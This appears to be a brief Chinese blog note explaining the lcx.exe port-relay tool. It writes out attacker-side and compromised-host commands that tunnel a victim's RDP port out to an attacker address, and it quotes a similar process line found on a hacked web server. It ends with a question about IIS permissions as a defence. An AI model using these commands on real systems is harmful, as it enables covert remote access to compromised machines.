用 virustotal 掃,說它是後門、遠端控制工具,google 上搜尋也把它跟 nc 同比,所以是類似的工具
怎麼用
攻擊端 (10.2.2.63)
lcx.exe -listen 33333 55555
肉雞端 (10.10.10.138)
lcx.exe -slave 10.2.2.63 33333 10.10.10.138 3389
可以用 mstsc 連 10.2.2.63:55555 成功遠端連線到 10.10.10.138,而不需用 10.10.10.138:3389 (前提是肉雞有開啟遠端連線功能),可以連但也要帳密才能登入
如果網站被丟到且執行了,或許在程序上會看到
"X:\RECYCLER\cmd.exe" /c X:\RECYCLER\lcx.exe -slave xx.xx.xx.xx 520 127.0.0.1 3389
是要把 IIS 應用程式的執行權限設成”僅指令碼” 嗎 ?
留言